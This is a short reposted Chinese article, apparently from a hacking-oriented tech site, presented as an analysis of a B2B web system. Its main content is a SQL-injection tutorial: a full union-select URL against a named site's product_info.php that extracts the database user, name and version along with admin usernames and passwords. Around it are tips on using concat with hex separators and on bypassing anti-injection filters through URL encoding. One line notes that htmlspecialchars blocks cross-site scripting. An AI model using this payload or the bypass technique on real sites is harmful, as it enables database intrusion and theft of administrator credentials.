当前位置:七道奇文章资讯安全技术网络技术
日期:2011-07-06 17:40:00  来源:本站整理

对B2B系统的解析[网络技术]

赞助商链接



  本文“对B2B系统的解析[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

用PHP的str_replace(array("\r\n,"\n"," "),array("<br>","<br>"," "),$_POST[''questiondes]),这种过滤关于跨站没有任何作用,可以用htmlspecialchars,htmentite来过滤;关于防注入程序,我们可以用URL编码来绕过的;

   一个最简单的concat:

看这里http://www.110hack.com/product_info.php?id=33+and+1=2+union+select+1,concat(0x757365723A,user(),0x5c,0x64617461626173653A,database(),0x5c,0x64617461626173652076657273696F6E3A,version()),3,4,5,concat(username,0x5c,password)+from+admin
先看2号显示位,concat(database(),0x5c,user(),0x5c,version())
当我们查询很多个东西的时刻,我们便可以用到concat,普通用在显示位只有一个的情形,假如直接把显示位上放上要查询的东西,一次只能查询一个,这样很麻烦,所以这个concat就有了用武之地,把几个东西结合起来.不管你查询语句是什么,都可以用concat套进去,简单的理解可以当作一种等级关系?反正理解不了的话可以这么看,hex()的括号可以括全部的东西,concat()的括号可以括别的东西.
不过concat有个缺陷就是结合起来查的东西都是不被分割的,也就是连成一片的,我们需求用特定标识来脱离,比方0x5f、0x5c、0xff等等


  以上是“对B2B系统的解析[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 对B2B系统的解析
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .